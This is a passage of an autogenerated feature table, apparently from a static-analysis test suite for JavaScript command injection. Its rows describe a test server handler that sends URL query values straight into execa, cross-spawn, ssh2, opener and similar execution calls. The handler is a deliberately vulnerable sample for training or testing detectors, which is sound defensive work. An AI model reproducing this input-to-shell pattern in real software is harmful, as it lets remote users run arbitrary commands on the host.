contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:22:28:25 | node | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:22:28:25 | node | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:22:28:25 | node | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:22:28:25 | node | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | CalleeFlexibleAccessPath | import(!).node | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:27:28:29 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | exceptional return of require ... child") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | exceptional return of require ... child") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | exceptional return of require ... child") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | exceptional return of require ... child") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | exceptional return of require ... child") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | exceptional return of require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | exceptional return of require ... ")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | exceptional return of require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | exceptional return of require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | exceptional return of require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:13:30:30 | "foreground-child" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | calleeImports | foreground-child | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:33:30:35 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:16 | opener | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:16 | opener | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:16 | opener | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:16 | opener | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:16 | opener | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener ... pener") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener ... pener") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener ... pener") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener ... pener") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:11:32:36 | opener ... pener") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:26 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:26 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:26 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:26 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:26 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | exceptional return of require("opener") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | exceptional return of require("opener") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | exceptional return of require("opener") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | exceptional return of require("opener") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | exceptional return of require("opener") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:28:32:35 | "opener" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:10 | opener | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:10 | opener | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:10 | opener | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:10 | opener | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:10 | opener | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | exceptional return of opener( ... y.user) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | exceptional return of opener( ... y.user) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | exceptional return of opener( ... y.user) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | exceptional return of opener( ... y.user) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | exceptional return of opener( ... y.user) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:31 | "http://github.com/" | stringConcatenatedWith | -endpoint- url.parse().query.user | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | CalleeFlexibleAccessPath | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | calleeImports | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:37 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:37 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:37 | url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:37 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:37 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:43 | url.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:43 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:43 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell 